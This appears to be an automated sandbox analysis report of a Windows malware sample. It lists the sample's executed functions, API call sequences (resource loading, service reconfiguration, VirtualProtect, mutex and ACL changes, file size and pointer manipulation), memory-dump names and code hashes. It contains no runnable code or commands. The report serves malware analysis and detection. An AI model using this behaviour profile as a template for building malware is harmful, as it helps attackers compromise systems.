                                                                                                                                                                                                                                                                                                                                  control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9, xrefs: 0040106E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                                                                                                                  • String ID: 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2803490479-4106697161
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
                                                                                                                                                                                                                                                                                                                                  Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4108700736-3916433284
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e83efdde7d34d28be519ed2e6888d9f42519b086e2d7e65c64a29ab7e0d92d08
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99F0F8B4E00209EFCB40EFADE981D8A77F8AB48304F104075F908D7751EA34EA488B64

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 004015D7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fe582e1601d302cbce5191f416901be7296c06efa158ae4c5e559ae214290ed6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b1c6e75d1534d4ff429dcf23c48c92ba32bf87342ab72c3f2d9668836e4f8392
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe582e1601d302cbce5191f416901be7296c06efa158ae4c5e559ae214290ed6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0A001B6E1AA80DEC3120E24BC662543EA4A93620670A25B3845287062A1694C08A721

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:7.6%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:38.2%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:33.1%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:254
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                                                                                  execution_graph 49824 825085 49825 825089 49824->49825 49826 82506f 49824->49826 49829 848550 49826->49829 49828 825078 49832 848556 49829->49832 49830 848145 GetLastError 49854 847dd7 49830->49854 49831 847d37 49831->49828 49832->49829 49832->49830 49832->49831 49835 848bc1 GetLastError 49832->49835 49836 848986 SetEntriesInAclW 49832->49836 49837 84890b LocalFree 49832->49837 49839 8489cd OpenMutexW 49832->49839 49844 847d30 49832->49844 49846 848599 49832->49846 49848 847d20 49832->49848 49849 84896a wsprintfW 49832->49849 49850 848953 AllocateAndInitializeSid 49832->49850 49851 848f87 wsprintfW 49832->49851 49832->49854 49833 8483fb GetUserNameW 49833->49854 49834 848209 GetUserNameW 49834->49831 49834->49854 49835->49832 49836->49832 49837->49832 49838 848248 49840 84824a GetLastError 49838->49840 49839->49828 49840->49828 49842 847d6c GetVolumeInformationW 49842->49828 49843 84836e GetLastError 49843->49854 49844->49831 49844->49842 49845 847fd4 GetLastError 49845->49854 49846->49844 49846->49849 49847 847d83 GetWindowsDirectoryW 49847->49831 49847->49844 49848->49831 49848->49842 49848->49844 49848->49847 49852 847e06 GetComputerNameW 49848->49852 49849->49844 49850->49832 49851->49831 49852->49831 49853 847f6b GetVolumeInformationW 49853->49854 49854->49830 49854->49831 49854->49833 49854->49834 49854->49838 49854->49840 49854->49842 49854->49843 49854->49844 49854->49845 49854->49848 49854->49853 49908 825a3b 49909 825a45 49908->49909 49914 824f7c 49908->49914 49910 825a4b CreateThread 49909->49910 49911 8251ae 49909->49911 49912 825a59 RtlExitUserThread 49910->49912 49918 825b1d 49912->49918 49913 824f88 49914->49913 49915 825d20 2 API calls 49914->49915 49917 824f99 49915->49917 49919 825d20 2 API calls 49918->49919 49920 825b3c 49919->49920 49855 59afeb0 49856 59afef6 GlobalMemoryStatusEx 49855->49856 49857 59aff26 49856->49857 49921 2cc0c10 49922 2cc0c19 49921->49922 49925 2cc4acf 49921->49925 49928 2cc3d8a 49921->49928 49931 2cc9080 49925->49931 49930 2cc9080 VirtualProtect 49928->49930 49929 2cc3da6 49930->49929 49933 2cc9093 49931->49933 49935 2cc9130 49933->49935 49936 2cc9178 VirtualProtect 49935->49936 49938 2cc4af1 49936->49938 49939 40cbdd 49940 40cbe9 49939->49940 49983 40d534 HeapCreate 49940->49983 49943 40cc46 50044 41087e 71 API calls 8 library calls 49943->50044 49946 40cc4c 49947 40cc50 49946->49947 49948 40cc58 __RTC_Initialize 49946->49948 50045 40cbb4 62 API calls 3 library calls 49947->50045 49985 411a15 67 API calls 2 library calls 49948->49985 49950 40cc57 49950->49948 49952 40cc66 49953 40cc72 GetCommandLineA 49952->49953 49954 40cc6a 49952->49954 49986 412892 71 API calls 3 library calls 49953->49986 50046 40e79a 62 API calls 3 library calls 49954->50046 49957 40cc71 49957->49953 49958 40cc82 50047 4127d7 107 API calls 3 library calls 49958->50047 49960 40cc8c 49961 40cc90 49960->49961 49962 40cc98 49960->49962 50048 40e79a 62 API calls 3 library calls 49961->50048 49987 41255f 106 API calls 6 library calls 49962->49987 49965 40cc97 49965->49962 49966 40cc9d 49967 40cca1 49966->49967 49968 40cca9 49966->49968 50049 40e79a 62 API calls 3 library calls 49967->50049 49988 40e859 73 API calls 5 library calls 49968->49988 49971 40cca8 49971->49968 49972 40ccb0 49973 40ccb5 49972->49973 49974 40ccbc 49972->49974 50050 40e79a 62 API calls 3 library calls 49973->50050 49989 4019f0 OleInitialize 49974->49989 49977 40ccd8 49979 40ccea 49977->49979 50051 40ea0a 62 API calls _doexit 49977->50051 49978 40ccbb 49978->49974 50052 40ea36 62 API calls _doexit 49979->50052 49982 40ccef __mtinitlocknum 49984 40cc3a 49983->49984 49984->49943 50043 40cbb4 62 API calls 3 library calls 49984->50043 49985->49952 49986->49958 49987->49966 49988->49972 49990 401ab9 49989->49990 50053 40b99e 49990->50053 49992 401abf 49993 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 49992->49993 50023 402467 49992->50023 49994 401dc3 CloseHandle GetModuleHandleA 49993->49994 50001 401c55 49993->50001 50066 401650 49994->50066 49996 401e8b FindResourceA LoadResource LockResource SizeofResource 50068 40b84d 49996->50068 50000 401c9c CloseHandle 50000->49977 50001->50000 50006 401cf9 Module32Next 50001->50006 50002 401ecb _memset 50003 401efc SizeofResource 50002->50003 50004 401f1c 50003->50004 50005 401f5f 50003->50005 50004->50005 50124 401560 __VEC_memcpy __fptostr 50004->50124 50008 401f92 _memset 50005->50008 50125 401560 __VEC_memcpy __fptostr 50005->50125 50006->49994 50015 401d0f 50006->50015 50010 401fa2 FreeResource 50008->50010 50011 40b84d _malloc 62 API calls 50010->50011 50012 401fbb SizeofResource 50011->50012 50013 401fe5 _memset 50012->50013 50014 4020aa LoadLibraryA 50013->50014 50016 401650 50014->50016 50015->50000 50018 401dad Module32Next 50015->50018 50017 40216c GetProcAddress 50016->50017 50019 4021aa 50017->50019 50017->50023 50018->49994 50018->50015 50019->50023 50098 4018f0 50019->50098 50021 40243f 50021->50023 50126 40b6b5 62 API calls 2 library calls 50021->50126 50023->49977 50024 4021f1 50024->50021 50110 401870 50024->50110 50026 402269 VariantInit 50027 401870 75 API calls 50026->50027 50028 40228b VariantInit 50027->50028 50029 4022a7 50028->50029 50030 4022d9 SafeArrayCreate SafeArrayAccessData 50029->50030 50115 40b350 50030->50115 50033 40232c 50034 402354 SafeArrayDestroy 50033->50034 50042 40235b 50033->50042 50034->50042 50035 402392 SafeArrayCreateVector 50036 4023a4 50035->50036 50037 4023bc VariantClear VariantClear 50036->50037 50117 4019a0 50037->50117 50040 40242e 50041 4019a0 65 API calls 50040->50041 50041->50021 50042->50035 50043->49943 50044->49946 50045->49950 50046->49957 50047->49960 50048->49965 50049->49971 50050->49978 50051->49979 50052->49982 50054 40b9aa __mtinitlocknum _strnlen 50053->50054 50055 40b9b8 50054->50055 50059 40b9ec 50054->50059 50127 40bfc1 62 API calls __getptd_noexit 50055->50127 50057 40b9bd 50128 40e744 6 API calls 2 library calls 50057->50128 50129 40d6e0 62 API calls 2 library calls 50059->50129 50061 40b9f3 50130 40b917 120 API calls 3 library calls 50061->50130 50063 40b9cd __mtinitlocknum 50063->49992 50064 40b9ff 50131 40ba18 LeaveCriticalSection _doexit 50064->50131 50067 4017cc ___crtGetEnvironmentStringsA 50066->50067 50067->49996 50069 40b900 50068->50069 50079 40b85f 50068->50079 50139 40d2e3 6 API calls __decode_pointer 50069->50139 50071 40b906 50140 40bfc1 62 API calls __getptd_noexit 50071->50140 50076 40b8bc RtlAllocateHeap 50076->50079 50077 40b870 50077->50079 50132 40ec4d 62 API calls 2 library calls 50077->50132 50133 40eaa2 62 API calls 7 library calls 50077->50133 50134 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 50077->50134 50079->50076 50079->50077 50080 40b8ec 50079->50080 50083 40b8f1 50079->50083 50085 401ebf 50079->50085 50135 40b7fe 62 API calls 4 library calls 50079->50135 50136 40d2e3 6 API calls __decode_pointer 50079->50136 50137 40bfc1 62 API calls __getptd_noexit 50080->50137 50138 40bfc1 62 API calls __getptd_noexit 50083->50138 50086 40af66 50085->50086 50088 40af70 50086->50088 50087 40b84d _malloc 62 API calls 50087->50088 50088->50087 50089 40af8a 50088->50089 50093 40af8c std::bad_alloc::bad_alloc 50088->50093 50141 40d2e3 6 API calls __decode_pointer 50088->50141 50089->50002 50091 40afb2 50143 40af49 62 API calls std::exception::exception 50091->50143 50093->50091 50142 40d2bd 73 API calls __cinit 50093->50142 50094 40afbc 50144 40cd39 RaiseException 50094->50144 50097 40afca 50099 401903 lstrlenA 50098->50099 50100 4018fc 50098->50100 50145 4017e0 72 API calls 3 library calls 50099->50145 50100->50024 50102 40191f MultiByteToWideChar 50103 401940 GetLastError 50102->50103 50104 401996 50102->50104 50105 40194b MultiByteToWideChar 50103->50105 50106 40198d 50103->50106 50104->50024 50146 4017e0 72 API calls 3 library calls 50105->50146 50106->50104 50147 401030 GetLastError 50106->50147 50109 401970 MultiByteToWideChar 50109->50106 50111 40af66 74 API calls 50110->50111 50112 40187c 50111->50112 50113 401885 SysAllocString 50112->50113 50114 4018a4 50112->50114 50113->50114 50114->50026 50116 40231a SafeArrayUnaccessData 50115->50116 50116->50033 50118 4019df VariantClear 50117->50118 50119 4019aa InterlockedDecrement 50117->50119 50118->50040 50119->50118 50120 4019b8 50119->50120 50120->50118 50121 4019c2 SysFreeString 50120->50121 50122 4019c9 50120->50122 50121->50122 50148 40aec0 63 API calls 2 library calls 50122->50148 50124->50004 50125->50008 50126->50023 50127->50057 50129->50061 50130->50064 50131->50063 50132->50077 50133->50077 50135->50079 50136->50079 50137->50083 50138->50085 50139->50071 50140->50085 50141->50088 50142->50091 50143->50094 50144->50097 50145->50102 50146->50109 50148->50118 49858 82520c 49861 84cbd0 49858->49861 49860 825211 49879 84be50 _wcslen 49861->49879 49862 84c168 49900 84a905 LocalFree 49862->49900 49865 84c78e CloseServiceHandle 49865->49879 49866 84bffd StrStrIW 49866->49879 49867 84c706 StrStrIW 49867->49879 49869 84bf68 StrStrIW 49869->49879 49870 84c72b StrStrIW 49870->49879 49871 84c399 StrStrIW 49876 84c3a9 49871->49876 49871->49879 49872 84bf7e 49875 84c7e4 StartServiceW 49872->49875 49877 84c36b OpenServiceW 49872->49877 49873 84c0fd CloseServiceHandle 49873->49879 49875->49879 49876->49860 49877->49879 49878 84c65a ChangeServiceConfigW 49878->49879 49880 84bfe9 49878->49880 49879->49860 49879->49861 49879->49862 49879->49865 49879->49866 49879->49867 49879->49869 49879->49870 49879->49871 49879->49872 49879->49873 49879->49875 49879->49878 49879->49880 49881 82ce90 49879->49881 49899 84a350 CloseServiceHandle 49879->49899 49901 825d20 49879->49901 49880->49860 49897 82cc9b _wcslen 49881->49897 49882 82d729 GetFileSizeEx 49886 82d8a1 CloseHandle 49882->49886 49882->49897 49883 825d20 VirtualAlloc VirtualFree 49883->49897 49884 82d426 49884->49886 49887 82d42a CloseHandle 49884->49887 49885 82d5c5 CreateFileW 49885->49897 49886->49897 49887->49897 49888 82cd5c lstrcmpiW 49888->49897 49890 82cc92 49890->49879 49891 82cca0 lstrcmpiW 49891->49897 49893 82d049 SetFilePointerEx 49893->49897 49894 82d378 CloseHandle 49894->49897 49895 85fdfc 40 API calls 49898 82d903 49895->49898 49896 82cfbb GetFileTime 49896->49897 49897->49879 49897->49881 49897->49882 49897->49883 49897->49884 49897->49885 49897->49886 49897->49887 49897->49888 49897->49890 49897->49891 49897->49893 49897->49894 49897->49896 49897->49898 49906 828937 VirtualAlloc VirtualFree 49897->49906 49907 828470 VirtualAlloc VirtualFree 49897->49907 49898->49890 49898->49895 49899->49879 49900->49880 49902 825d22 49901->49902 49902->49879 49903 825d39 VirtualAlloc 49902->49903 49905 825d46 VirtualFree 49902->49905 49903->49902 49905->49879 49906->49897 49907->49897

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->49 50 401f77-401f8d call 401560 43->50 44->43 45->32 45->39 46->7 51 401d0f 46->51 47->42 49->5 85 4021aa-4021c0 49->85 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 67 401d55-401d57 63->67 65 401d3a-401d40 64->65 66 401d4c-401d4e 64->66 65->63 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 2b7d006 122->152 153 40234e call 2b7d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-40238f call 4018d0 132->135 133->135 154 402390 call 2b7d006 135->154 155 402390 call 2b7d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                                                                                                                                                  • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                                                                                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                                                                                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                                                                                                                                                  Function 00848550 Relevance: 21.5, APIs: 14, Instructions: 515COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70d9cefdcd715ae7bbda575b6d006794ceb7c406be710e38ac075b597b19c28b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44ee2631e5ff40fa53d5c19d0fcb596929eb572e066e35de90909b6710dbdf1f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70d9cefdcd715ae7bbda575b6d006794ceb7c406be710e38ac075b597b19c28b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF1172191D74CDECB364B684C0973D3BA0FB72B34F4D0696E561D61E2EF688C089627
                                                                                                                                                                                                                                                                                                                                  Function 05A2A500 Relevance: 2.9, Instructions: 2880COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f4fd0f1439c465497320e51578000e10dc4f8713eff4bce9bc1b092385057de
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eaec65ad90886468ca61f625d3cede2612502f3df489fd0a2f804b9a24c2dae6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f4fd0f1439c465497320e51578000e10dc4f8713eff4bce9bc1b092385057de
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C363FB31D10B1A8ADB11EF68C854AA9F7B1FF99300F11C79AE45877121EB70AAD5CF81
                                                                                                                                                                                                                                                                                                                                  Function 05A2D9B0 Relevance: 2.3, Instructions: 2320COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 05b1f5d12c06e12b73215ed90e0558d196bbcf2f8ed2fac51f7fdeeb816b37e2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3d7fd202f4193e510d1a4aaf8ae5e9fa68e7d6adba44b0a46077ac4424bf3635
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05b1f5d12c06e12b73215ed90e0558d196bbcf2f8ed2fac51f7fdeeb816b37e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9331F31D107198ECB11EF68C894AADF7B1FF99300F15C79AE459A7211EB70AAC5CB81
                                                                                                                                                                                                                                                                                                                                  Function 05A217F8 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
